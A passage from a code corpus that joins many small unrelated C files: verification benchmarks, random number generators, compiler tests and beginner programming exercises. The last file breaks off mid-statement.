printf("* set (controller, plant, and impl) parameters to check CLOSED LOOP with DSVerifier *\n");
printf("*****************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
else
{
printf("\n\n*****************************************************************************************************\n");
printf("* set (controller and impl) parameters so that they do not overflow *\n");
printf("*****************************************************************************************************\n");
unsigned j;
for (j = 0; j < controller.a_size; ++j)
{
const double value=controller.a[j];
__DSVERIFIER_assert(value <= _dbl_max);
__DSVERIFIER_assert(value >= _dbl_min);
}
for (j = 0; j < controller.b_size; ++j)
{
const double value=controller.b[j];
__DSVERIFIER_assert(value <= _dbl_max);
__DSVERIFIER_assert(value >= _dbl_min);
}
}
if (controller.b_size > 0)
{
unsigned j, zeros=0;
for (j = 0; j < controller.b_size; ++j)
{
if (controller.b[j]==0)
++zeros;
}
if (zeros == controller.b_size)
{
printf("\n\n*****************************************************************************************************\n");
printf("* The controller numerator must not be zero *\n");
printf("*****************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (controller.a_size > 0)
{
unsigned j, zeros=0;
for (j = 0; j < controller.a_size; ++j)
{
if (controller.a[j]==0)
++zeros;
}
if (zeros == controller.a_size)
{
printf("\n\n*****************************************************************************************************\n");
printf("* The controller denominator must not be zero *\n");
printf("*****************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (0 == 0)
{
printf("\n\n***************************************************************************************************************\n");
printf("* set a connection mode to check CLOSED LOOP with DSVerifier (use: --connection-mode TYPE) *\n");
printf("***************************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (3 == 0)
{
printf("\n\n***************************************************************************************\n");
printf("* set the property to check with DSVerifier (use: --property NAME) *\n");
printf("***************************************************************************************\n");
__DSVERIFIER_assert(0);
}
if ((3 == 3) || (3 == 2) || (3 == 1) ||
(3 == 10) || (3 == 11) ||
(3 == 4 || 3 == 5) || 3 == 6)
{
if ((15 == 0) && !(0 == 1))
{
printf("\n\n********************************************************************************************\n");
printf("* set a X_SIZE to use this property in DSVerifier (use: --x-size VALUE) *\n");
printf("********************************************************************************************\n");
__DSVERIFIER_assert(0);
}
else if (0 == 1)
{
X_SIZE_VALUE = nondet_uint();
__DSVERIFIER_assume( X_SIZE_VALUE > (2 * ds.a_size));
}
else if (15 < 0)
{
printf("\n\n********************************************************************************************\n");
printf("* set a X_SIZE > 0 *\n");
printf("********************************************************************************************\n");
__DSVERIFIER_assert(0);
}
else
{
X_SIZE_VALUE = 15;
}
}
if ((3 == 0) && (3 != 9) && (3 != 18))
{
printf("\n\n*********************************************************************************************\n");
printf("* set the realization to check with DSVerifier (use: --realization NAME) *\n");
printf("*********************************************************************************************\n");
__DSVERIFIER_assert(0);
}
if (3 == 6 || 3 == 11)
{
if (impl.max_error == 0)
{
printf("\n\n***********************************************************************\n");
printf("* provide the maximum expected error (use: impl.max_error) *\n");
printf("***********************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (3 == 4 || 3 == 5)
{
if (3 == 5 || 3 == 4)
{
if (hw.clock == 0l)
{
printf("\n\n***************************\n");
printf("* Clock could not be zero *\n");
printf("***************************\n");
__DSVERIFIER_assert(0);
}
hw.cycle = ((double) 1.0 / hw.clock);
if (hw.cycle < 0)
{
printf("\n\n*********************************************\n");
printf("* The cycle time could not be representable *\n");
printf("*********************************************\n");
__DSVERIFIER_assert(0);
}
if (ds.sample_time == 0)
{
printf("\n\n*****************************************************************************\n");
printf("* provide the sample time of the digital system (ds.sample_time) *\n");
printf("*****************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
}
if (3 == 18)
{
if (!((filter.Ap > 0) && (filter.Ac >0) && (filter.Ar >0)))
{
printf("\n\n*****************************************************************************\n");
printf("* set values bigger than 0 for Ap, Ac and Ar* \n");
printf("*****************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if ((3 == 7) || (3 == 8) || (3 == 9) ||
(3 == 10) || (3 == 11) || (3 == 12))
{
printf("\n\n******************************************\n");
printf("* Temporarily the cascade modes are disabled *\n");
printf("**********************************************\n");
__DSVERIFIER_assert(0);
}
}
void call_verification_task(void * verification_task)
{
int i = 0;
_Bool base_case_executed = 0;
if (0 == 2)
{
for(i=0; i<ds.b_size; i++)
{
if (ds.b_uncertainty[i] > 0)
{
double factor = ds.b_uncertainty[i];
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.b[i] - factor;
double max = ds.b[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.b[i] = nondet_double();
__DSVERIFIER_assume((ds.b[i] >= min) && (ds.b[i] <= max));
}
}
for(i=0; i<ds.a_size; i++)
{
if (ds.a_uncertainty[i] > 0)
{
double factor = ds.a_uncertainty[i];
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.a[i] - factor;
double max = ds.a[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.a[i] = nondet_double();
__DSVERIFIER_assume((ds.a[i] >= min) && (ds.a[i] <= max));
}
}
}
else
{
int i=0;
for(i=0; i<ds.b_size; i++)
{
if (ds.b_uncertainty[i] > 0)
{
double factor = ((ds.b[i] * ds.b_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.b[i] - factor;
double max = ds.b[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.b[i] = nondet_double();
__DSVERIFIER_assume((ds.b[i] >= min) && (ds.b[i] <= max));
}
}
for(i=0; i<ds.a_size; i++)
{
if (ds.a_uncertainty[i] > 0)
{
double factor = ((ds.a[i] * ds.a_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.a[i] - factor;
double max = ds.a[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.a[i] = nondet_double();
__DSVERIFIER_assume((ds.a[i] >= min) && (ds.a[i] <= max));
}
}
}
((void(*)())verification_task)();
}
void call_closedloop_verification_task(void * closedloop_verification_task)
{
_Bool base_case_executed = 0;
int i=0;
for(i=0; i<plant.b_size; i++)
{
if (plant.b_uncertainty[i] > 0)
{
double factor = ((plant.b[i] * plant.b_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = plant.b[i] - factor;
double max = plant.b[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
plant_cbmc.b[i] = nondet_double();
__DSVERIFIER_assume((plant_cbmc.b[i] >= min) && (plant_cbmc.b[i] <= max));
}else{
plant_cbmc.b[i] = plant.b[i];
}
}
for(i=0; i<plant.a_size; i++)
{
if (plant.a_uncertainty[i] > 0)
{
double factor = ((plant.a[i] * plant.a_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = plant.a[i] - factor;
double max = plant.a[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
plant_cbmc.a[i] = nondet_double();
__DSVERIFIER_assume((plant_cbmc.a[i] >= min) && (plant_cbmc.a[i] <= max));
}
else
{
plant_cbmc.a[i] = plant.a[i];
}
}
((void(*)())closedloop_verification_task)();
}
# 2 "benchmarks/ds-07-impl2.c" 2
digital_system ds = {
.b = { 0.1, -0.09998 },
.b_size = 2,
.a = { 1.0, -1.0 },
.a_size = 2,
.sample_time = 0.02
};
implementation impl = {
.int_bits = 8,
.frac_bits = 8,
.max = 1.0,
.min = -1.0
};
|
the_stack_data/15762557.c | #include <math.h>
#include <stdint.h>
#include <stdlib.h>
#include <time.h>
// A C-program for TT800 : July 8th 1996 Version
// by M. Matsumoto, email: [email protected]
// genrand() generate one pseudorandom number with double precision
// which is uniformly distributed on [0,1]-interval
// for each call. One may choose any initial 25 seeds
// except all zeros.
// See: ACM Transactions on Modelling and Computer Simulation,
// Vol. 4, No. 3, 1994, pages 254-266.
#define N 25
#define M 7
uint64_t x[N]; // initial 25 seeds, change as you wish
static double genrand() {
uint64_t y;
static int k = 0;
static uint64_t mag01[2] = {
0x0, 0x8ebfd028 // this is magic vector `a', don't change
};
if (k == N) { // generate N words at one time
int kk;
for (kk = 0; kk < N - M; kk++) {
x[kk] = x[kk + M] ^ (x[kk] >> 1) ^ mag01[x[kk] % 2];
}
for (; kk < N; kk++) {
x[kk] = x[kk + (M - N)] ^ (x[kk] >> 1) ^ mag01[x[kk] % 2];
}
k = 0;
}
y = x[k];
y ^= (y << 7) & 0x2b5b2500; // s and b, magic vectors
y ^= (y << 15) & 0xdb8b0000; // t and c, magic vectors
y &= 0xffffffff; // you may delete this line if word size = 32
// the following line was added by Makoto Matsumoto in the 1996 version
// to improve lower bit's correlation.
// Delete this line to o use the code published in 1994.
y ^= (y >> 16); // added to the 1994 version
k++;
return ((double)y / (unsigned long)0xffffffff);
}
// Initialize the random seeds.
void Randomize() {
srand(time(NULL));
for (int i = 0; i < N; i++) {
x[i] = rand();
}
}
// Gives a random float evenly distributed in the interval [min, max]
float RanFl(float min, float max) {
return genrand() * (max - min) + min;
}
// Gives a random int evenly distributed in the interval [min, max-1]
int RanInt(int min, int max) {
double ran;
do
ran = genrand();
while (ran == 1);
return floor(ran * (max - min) + min);
}
// Returns true with a probability of prob
// (i.e. if prob is is 1 always return true, if prob is 0 always return false)
int RanProb(float prob) {
return genrand() <= prob;
}
|
the_stack_data/857758.c | // code: 2
int main() {
int i = 1;
int *p = &i;
*p = 2;
return i;
} |
the_stack_data/142784.c | extern void __VERIFIER_error() __attribute__ ((__noreturn__));
extern int __VERIFIER_nondet_int();
int main()
{
int x, y;
if (__VERIFIER_nondet_int())
{
x = 0;
y = 1;
}
else
{
x = 1;
y = 0;
}
// if (!(x + y == 1))
if (x + y != 1)
__VERIFIER_error();
return 0;
}
// ./goblint --enable ana.sv-comp --enable ana.wp --enable exp.witness.uncil --disable ana.int.def_exc --enable ana.int.interval --set ana.activated '["base"]' --set phases '[{}, {"ana": {"activated": ["base", "observer"], "path_sens": ["observer"]}}]' --html tests/sv-comp/observer/path_nofun_true-unreach-call.c
// ./goblint --enable ana.sv-comp --enable ana.wp --enable exp.witness.uncil --disable ana.int.def_exc --enable ana.int.interval --set ana.activated '["base"]' --html tests/sv-comp/observer/path_nofun_true-unreach-call.c |
the_stack_data/179829436.c | /*
* _XBGAS-BOOTSTRAP_C_
*
* Copyright (C) 2017-2018 Tactical Computing Laboratories, LLC
* All Rights Reserved
* [email protected]
*
* This file is a part of the XBGAS-RUNTIME package. For license
* information, see the LICENSE file in the top level directory
* of the distribution.
*
*/
__attribute__ ((constructor(0))) __attribute((__section__(".init.text"))) static void __xbgas_ctor();
__attribute__ ((destructor(0))) __attribute((__section__(".exit.text"))) static void __xbgas_dtor();
#ifdef XBGAS_RV32
void __rv32_bootstrap(){
/* rv32 bootstrap code goes here */
}
void __rv32_dtor(){
/* rv32 destructor code goes here */
}
#else
void __rv64_bootstrap(){
/* rv64 bootstrap code goes here */
}
void __rv64_dtor(){
/* rv64 destructor code goes here */
}
#endif
static void __xbgas_ctor(){
#ifdef XBGAS_RV32
/* execute rv32 bootstrap code */
__rv32_bootstrap();
#else
/* execute rv64 bootstrap code */
__rv64_bootstrap();
#endif
}
static void __xbgas_dtor(){
#ifdef XBGAS_RV32
/* execute rv32 destructor code */
__rv32_dtor();
#else
/* execute rv64 destructor code */
__rv64_dtor();
#endif
}
/* EOF */
|
the_stack_data/11075038.c | int mylib_bb() {
return 48;
}
int internal_bb() {
return 64;
}
|
the_stack_data/92179.c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ft_print_params.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: kaye <[email protected]> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2020/08/10 19:41:33 by kaye #+# #+# */
/* Updated: 2020/08/10 19:52:38 by kaye ### ########.fr */
/* */
/* ************************************************************************** */
#include <unistd.h>
void ft_putstr(char *str)
{
while (*str)
write(1, str++, 1);
}
int main(int argc, char **argv)
{
int i;
i = 0;
while (++i < argc)
{
ft_putstr(argv[i]);
write(1, "\n", 1);
}
return (0);
}
|
the_stack_data/12637449.c | #include <stdio.h>
#define GRID_SIZE 9
void outasm(int x, int y)
{
// each cell occupies 2 bytes in memory. Hence the multiplications here.
printf("$%02x, ", y * GRID_SIZE * 2 + x * 2 );
// printf("[%d,%d] ", x, y);
}
int computeNbrs(int x, int y, void (*outfn)(int x, int y))
{
int X, Y, i, j;
// Same row
for (X=0; X<x; X++) {
outfn(X,y);
}
for (X=x+1; X<GRID_SIZE; X++) {
outfn(X,y);
}
// Same column
for (Y=0; Y<y; Y++) {
outfn(x,Y);
}
for (Y=y+1; Y<GRID_SIZE; Y++) {
outfn(x,Y);
}
// Same cell AND *NOT* already output above
for (Y = (y/3)*3, j = 0; j < 3; j++,Y++) {
for (X = (x/3)*3, i = 0; i < 3; i++,X++) {
if (Y != y && X != x) {
outfn(X,Y);
}
}
}
// Same cell *AND* already output above
for (Y = (y/3)*3, j = 0; j < 3; j++,Y++) {
for (X = (x/3)*3, i = 0; i < 3; i++,X++) {
if ((Y == y || X == x) && !(Y == y && X == x)) {
outfn(X,Y);
}
}
}
return 0;
}
void printit(int x, int y)
{
printf("[%d,%d] ",x,y);
}
void test1(void)
{
printf("4,4: ");
computeNbrs(4,4,printit);
printf("\n");
}
int main(int argc, char **argv)
{
int y,x;
int testing = 0;
if (testing) {
test1();
return 0;
}
printf(";\n; Generated by neighbors.c\n;\n");
// First the lists of neighbors
for (y=0; y<GRID_SIZE; y++) {
for (x=0; x<GRID_SIZE; x++) {
printf("_nbors_%d_%d: .dw ", x, y);
computeNbrs(x,y,outasm);
printf("\n");
}
}
// Now the 9x9 word array pointing to each list
printf("neighbor_list:\n");
for (y=0; y<GRID_SIZE; y++) {
printf(" .dw ");
for (x=0; x<GRID_SIZE; x++) {
printf("_nbors_%d_%d, ", x, y);
}
printf("\n");
}
return 0;
}
|
the_stack_data/176705707.c | // @see http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/VERSIONS/C-LANG/mt19937-64.c
/*
A C-program for MT19937-64 (2004/9/29 version).
Coded by Takuji Nishimura and Makoto Matsumoto.
This is a 64-bit version of Mersenne Twister pseudorandom number
generator.
Before using, initialize the state by using init_genrand64(seed)
or init_by_array64(init_key, key_length).
Copyright (C) 2004, Makoto Matsumoto and Takuji Nishimura,
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The names of its contributors may not be used to endorse or promote
products derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
References:
T. Nishimura, ``Tables of 64-bit Mersenne Twisters''
ACM Transactions on Modeling and
Computer Simulation 10. (2000) 348--357.
M. Matsumoto and T. Nishimura,
``Mersenne Twister: a 623-dimensionally equidistributed
uniform pseudorandom number generator''
ACM Transactions on Modeling and
Computer Simulation 8. (Jan. 1998) 3--30.
Any feedback is very welcome.
http://www.math.hiroshima-u.ac.jp/~m-mat/MT/emt.html
email: m-mat @ math.sci.hiroshima-u.ac.jp (remove spaces)
*/
#include <stdio.h>
#define NN 312
#define MM 156
#define MATRIX_A 0xB5026F5AA96619E9ULL
#define UM 0xFFFFFFFF80000000ULL /* Most significant 33 bits */
#define LM 0x7FFFFFFFULL /* Least significant 31 bits */
/* The array for the state vector */
static unsigned long long mt[NN];
/* mti==NN+1 means mt[NN] is not initialized */
static int mti=NN+1;
/* initializes mt[NN] with a seed */
void init_genrand64(unsigned long long seed)
{
mt[0] = seed;
for (mti=1; mti<NN; mti++)
mt[mti] = (6364136223846793005ULL * (mt[mti-1] ^ (mt[mti-1] >> 62)) + mti);
}
/* generates a random number on [0, 2^64-1]-interval */
unsigned long long genrand64_int64(void)
{
int i;
unsigned long long x;
static unsigned long long mag01[2]={0ULL, MATRIX_A};
if (mti >= NN) { /* generate NN words at one time */
/* if init_genrand64() has not been called, */
/* a default initial seed is used */
if (mti == NN+1)
init_genrand64(5489ULL);
for (i=0;i<NN-MM;i++) {
x = (mt[i]&UM)|(mt[i+1]&LM);
mt[i] = mt[i+MM] ^ (x>>1) ^ mag01[(int)(x&1ULL)];
}
for (;i<NN-1;i++) {
x = (mt[i]&UM)|(mt[i+1]&LM);
mt[i] = mt[i+(MM-NN)] ^ (x>>1) ^ mag01[(int)(x&1ULL)];
}
x = (mt[NN-1]&UM)|(mt[0]&LM);
mt[NN-1] = mt[MM-1] ^ (x>>1) ^ mag01[(int)(x&1ULL)];
mti = 0;
}
x = mt[mti++];
x ^= (x >> 29) & 0x5555555555555555ULL;
x ^= (x << 17) & 0x71D67FFFEDA60000ULL;
x ^= (x << 37) & 0xFFF7EEE000000000ULL;
x ^= (x >> 43);
return x;
}
|
the_stack_data/55379.c | // RUN: %clang_cc1 -fsyntax-only -Wunused -std=c2x -verify %s
struct [[maybe_unused]] S1 { // ok
int a [[maybe_unused]];
};
enum [[maybe_unused]] E1 {
EnumVal [[maybe_unused]]
};
[[maybe_unused]] void unused_func([[maybe_unused]] int parm) {
typedef int maybe_unused_int [[maybe_unused]];
[[maybe_unused]] int I;
}
void f1(void) {
int x; // expected-warning {{unused variable}}
typedef int I; // expected-warning {{unused typedef 'I'}}
// Should not warn about these due to not being used.
[[maybe_unused]] int y;
typedef int maybe_unused_int [[maybe_unused]];
// Should not warn about these uses.
struct S1 s;
maybe_unused_int test;
y = 12;
}
void f2(void);
[[maybe_unused]] void f2(void);
void f2(void) {
}
|
the_stack_data/113844.c | /* Generated by CIL v. 1.7.0 */
/* print_CIL_Input is false */
struct _IO_FILE;
struct timeval;
extern void signal(int sig , void *func ) ;
extern float strtof(char const *str , char const *endptr ) ;
typedef struct _IO_FILE FILE;
extern int atoi(char const *s ) ;
extern double strtod(char const *str , char const *endptr ) ;
extern int fclose(void *stream ) ;
extern void *fopen(char const *filename , char const *mode ) ;
extern void abort() ;
extern void exit(int status ) ;
extern int raise(int sig ) ;
extern int fprintf(struct _IO_FILE *stream , char const *format , ...) ;
extern int strcmp(char const *a , char const *b ) ;
extern int rand() ;
extern unsigned long strtoul(char const *str , char const *endptr , int base ) ;
void RandomFunc(unsigned long input[1] , unsigned long output[1] ) ;
extern int strncmp(char const *s1 , char const *s2 , unsigned long maxlen ) ;
extern int gettimeofday(struct timeval *tv , void *tz , ...) ;
extern int printf(char const *format , ...) ;
int main(int argc , char *argv[] ) ;
void megaInit(void) ;
extern unsigned long strlen(char const *s ) ;
extern long strtol(char const *str , char const *endptr , int base ) ;
extern unsigned long strnlen(char const *s , unsigned long maxlen ) ;
extern void *memcpy(void *s1 , void const *s2 , unsigned long size ) ;
struct timeval {
long tv_sec ;
long tv_usec ;
};
extern void *malloc(unsigned long size ) ;
extern int scanf(char const *format , ...) ;
int main(int argc , char *argv[] )
{
unsigned long input[1] ;
unsigned long output[1] ;
int randomFuns_i5 ;
unsigned long randomFuns_value6 ;
int randomFuns_main_i7 ;
{
megaInit();
if (argc != 2) {
printf("Call this program with %i arguments\n", 1);
exit(-1);
} else {
}
randomFuns_i5 = 0;
while (randomFuns_i5 < 1) {
randomFuns_value6 = strtoul(argv[randomFuns_i5 + 1], 0, 10);
input[randomFuns_i5] = randomFuns_value6;
randomFuns_i5 ++;
}
RandomFunc(input, output);
if (output[0] == 9404365957200663162UL) {
printf("You win!\n");
} else {
}
randomFuns_main_i7 = 0;
while (randomFuns_main_i7 < 1) {
printf("%lu\n", output[randomFuns_main_i7]);
randomFuns_main_i7 ++;
}
}
}
void RandomFunc(unsigned long input[1] , unsigned long output[1] )
{
unsigned long state[1] ;
unsigned long local2 ;
unsigned long local1 ;
unsigned int copy11 ;
unsigned int copy12 ;
{
state[0UL] = (input[0UL] + 914778474UL) * 67330564296145686UL;
local1 = 0UL;
while (local1 < 1UL) {
local2 = 0UL;
while (local2 < 1UL) {
if (state[0UL] < local2 + local1) {
copy11 = *((unsigned int *)(& state[local2]) + 0);
*((unsigned int *)(& state[local2]) + 0) = *((unsigned int *)(& state[local2]) + 1);
*((unsigned int *)(& state[local2]) + 1) = copy11;
} else {
copy12 = *((unsigned int *)(& state[0UL]) + 0);
*((unsigned int *)(& state[0UL]) + 0) = *((unsigned int *)(& state[0UL]) + 1);
*((unsigned int *)(& state[0UL]) + 1) = copy12;
}
local2 ++;
}
local1 ++;
}
output[0UL] = state[0UL] + 170797531UL;
}
}
void megaInit(void)
{
{
}
}
|
the_stack_data/14201683.c | #include "stdio.h"
int main() {
float fahr, celsius;
int lower, upper, step;
lower = 0;
upper = 300;
step = 20;
fahr = lower;
printf("far \t cel\n");
printf("===============\n");
while (fahr <= upper) {
celsius = (5.0/9.0) * (fahr-32.0);
// 6.1f print as floating point, at least 6 wide and 1 after decimal point
printf("%3.0f\t%6.1f\n", fahr, celsius);
fahr = fahr + step;
}
}
|
the_stack_data/36075317.c | #include<stdio.h>
int r,c,p[100][100],q[100][100]={0};
void dp(int i,int j)
{
int x=-1;
if (q[i][j]!=0)
return ;
if (i>0 && p[i-1][j]>p[i][j])
{
if (q[i-1][j]==0)
dp(i-1,j);
if (q[i-1][j]>x)
x=q[i-1][j];
}
if (i<r-1 && p[i+1][j]>p[i][j])
{
if (q[i+1][j]==0)
dp(i+1,j);
if (q[i+1][j]>x)
x=q[i+1][j];
}
if (j>0 && p[i][j-1]>p[i][j])
{
if (q[i][j-1]==0)
dp(i,j-1);
if (q[i][j-1]>x)
x=q[i][j-1];
}
if (j<c-1 && p[i][j+1]>p[i][j])
{
if (q[i][j+1]==0)
dp(i,j+1);
if (q[i][j+1]>x)
x=q[i][j+1];
}
q[i][j]=x+1;
}
int main()
{
int i,j,m=0;
scanf("%d%d",&r,&c);
for (i=0;i<r;i++)
for (j=0;j<c;j++)
scanf("%d",&p[i][j]);
for (i=0;i<r;i++)
{
for (j=0;j<c;j++)
{
dp(i,j);
if (q[i][j]>m)
m=q[i][j];
}
}
printf("%d\n",m+1);
return 0;
}
|
the_stack_data/98574560.c | /* Escreva um programa que armazene 10 números inteiros em 2 vetores de tamanho 5. Ao final, o programa
deve mostrar os números comuns aos dois vetores. */
#include <stdio.h>
int main()
{
int vetor_A[5], vetor_B[5], vetor_AB[5], c;
for (c = 0; c < 5; c++)
{
printf("digite um numero para o vetor A: ");
scanf("%d", &vetor_A[c]);
}
for (c = 0; c < 5; c++)
{
printf("digite um numero para o vetor B: ");
scanf("%d", &vetor_B[c]);
}
int limite = 5;
for (c = 0; c < 5; c++)
{
for (int d = 0; d < limite; d++)
{
printf("se o Vetor_A[%d] = Vetor_B[%d] / %d = %d\n", c, d, vetor_A[c], vetor_B[d]);
if (vetor_A[c] == vetor_B[d])
{
for (int e = d; e < limite; e++)
{
vetor_B[e] = vetor_B[e + 1];
if (e == limite - 1)
{
limite--;
vetor_AB[limite] = NULL;
d--;
}
vetor_AB[c] = vetor_A[c];
}
}
}
printf("\n");
}
for (c = 0; c < 5 - limite; c++)
{
printf("\n%d", vetor_AB[c]);
}
return 0;
} |
the_stack_data/28262557.c | #include <stdio.h>
#include <stdlib.h>
int main(){
char s1[8], s2[8], s3[8], aux;
int a, b, c;
do{
int i = 0, j = 0;
while(1){
scanf("%c", &aux);
printf("%c", aux);
if (aux == '\n')
break;
else if (aux == '+'){
s1[i] = '\0';
a = atoi(s1);
i = 0;
j = 1;
} else if (aux == '='){
s2[i] = '\0';
b = atoi(s2);
i = 0;
j = 2;
} else {
switch(j){
case 0:
s1[i] = aux;
break;
case 1:
s2[i] = aux;
break;
case 2:
s3[i] = aux;
break;
default:
printf("error\n");
break;
}
i++;
}
}
c = atoi(s3);
printf("\n");
printf("%d %d %d\n", a, b, c);
} while(a != 0 || b != 0 || c!= 0);
}
|
the_stack_data/150144009.c | #include <stdlib.h>
extern int f2(void);
extern int f3(void);
extern void f1(void);
void
ff(int fname, int part, int nparts)
{
if (fname) /* bb 0 */
{
if (nparts) /* bb 1 */
f1(); /* bb 2 */
}
else
fname = 2; /* bb 3 */
/* bb 4 is the branch to bb 10
(bb 10 is physically at the end of the loop) */
while (f3() /* bb 10 */)
{
if (nparts /* bb 5 */ && f2() /* bb 6 */)
{
f1(); /* bb 7 ... */
nparts = part;
if (f3()) /* ... bb 7 */
f1(); /* bb 8 */
f1(); /* bb 9 */
break;
}
}
if (nparts) /* bb 11 */
f1(); /* bb 12 */
return; /* bb 13 */
}
int main(void)
{
ff(0, 1, 0);
return 0;
}
int f3(void) { static int x = 0; x = !x; return x; }
void f1(void) { abort(); }
int f2(void) { abort(); }
|
the_stack_data/951.c | #include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#define PACKET_SIZE 256
#define THRESHOLD_VAL 10
// Performs thresholding with <THRESHOLD_VAL> and performs zero-length encoding
// @data: pointer to the dataset to encode; encodes <PACKET_SIZE> bytes at a time
// @output: pointer to the output buffer; assume max size of <PACKET_SIZE> bytes
// @return: final size of the encoded packet
int encode(float *data, float *output)
{
int i, j;
char zero_length = 0;
for (i = 0, j = 0; i < PACKET_SIZE, j < PACKET_SIZE; i++)
{
if (data[i] < THRESHOLD_VAL)
{
if (!zero_length)
{
output[j] = 0;
j++;
output[j] = 0;
zero_length = 1;
}
output[j]++;
}
else
{
if (zero_length)
{
zero_length = 0;
j++;
}
output[j] = data[i];
j++;
}
}
return j;
}
|
the_stack_data/103265438.c | #include <stdarg.h>
/* Passed on stack. */
struct object {
long a, b, c, d;
};
/* Needs two registers. */
struct point {
char tag;
int x, y;
};
struct object sum(int n, struct object obj, ...)
{
int value = 0, i;
va_list args;
printf ("%ld,%ld,%ld,%ld\n", obj.a, obj.b, obj.c, obj.d);
va_start(args, obj);
for (i = 0; i < n; ++i) {
if (i < 3) {
value += va_arg(args, int);
} else {
struct point p = va_arg(args, struct point);
value += p.x + p.y;
}
printf ("%d:%d\n", i, value);
printf ("%ld,%ld,%ld,%ld\n", obj.a, obj.b, obj.c, obj.d);
}
va_end(args);
obj.a = value;
return obj;
}
int main() {
struct point u = {'u', 2, 3};
struct point v = {'v', 5, 6};
struct object obj = {0};
obj = sum(5, obj, 8, 9, 8, u, v);
printf ("%ld,%ld,%ld,%ld\n", obj.a, obj.b, obj.c, obj.d);
return obj.a + obj.b + obj.c + obj.d;
}
|
the_stack_data/70827.c | #include <stdio.h>
#include <stdlib.h>
int main() {
printf("**Welcome to my calculator**\n");
printf("Please enter the number of the option you would like to do : \n1. Subtract\n2. Add\n3. Multiply\n4. Divide\n5. Exit\n");
int choice;
int x;
int y;
int z;
scanf("%d", &choice);
printf("Please type the first number you would like to operate on : ");
scanf("%d", &x);
printf("Please type the second number you would like to operate on : ");
scanf("%d", &y);
switch (choice) {
case 1:
z = x - y;
break;
case 2:
z = x + y;
break;
case 3:
z = x * y;
break;
case 4:
z = x / y;
break;
case 5:
exit(0);
}
printf("The answer is %d", z);
return 0;
} |
the_stack_data/176706897.c | /*********************************************************
* From C PROGRAMMING: A MODERN APPROACH, Second Edition *
* By K. N. King *
* Copyright (c) 2008, 1996 W. W. Norton & Company, Inc. *
* All rights reserved. *
* This program may be freely distributed for class use, *
* provided that this copyright notice is retained. *
*********************************************************/
/* tsetjmp.c (Chapter 24, page 636) */
/* Tests setjmp/longjmp */
#include <setjmp.h>
#include <stdio.h>
jmp_buf env;
void f1();
void f2();
int main() {
if (setjmp(env) == 0)
printf("setjmp returned 0\n");
else {
printf("Program terminates: longjmp called\n");
return 0;
}
f1();
printf("Program terminates normally\n");
return 0;
}
void f1() {
printf("f1 begins\n");
f2();
printf("f1 returns\n");
}
void f2() {
printf("f2 begins\n");
longjmp(env, 1);
printf("f2 returns\n");
}
|
the_stack_data/805708.c | # include <stdio.h>
# include <unistd.h>
int main(int argc, char*argv[])
{
while(1) {
sleep(1);
}
return 0 ;
}
|
the_stack_data/248579492.c | #include <stdio.h>
int main()
{
int n = 5;
for(int i = n; i >= 1; i--) {
for(int j = 1; j <= i; j++) {
if(i % 2 == 0)
printf("* ");
else
printf("%d ", i);
}
printf("\n");
}
return 0;
} |
the_stack_data/350586.c | #include<stdlib.h>
#include<string.h>
int main() {
int T, t;
scanf("%d", &T);
for(t=0;t<T;t++) {
int K, C, S, i;
scanf("%d %d %d", &K, &C, &S);
printf("Case #%d: ", t+1);
if(K==1 || C==1) {
if(K>S)
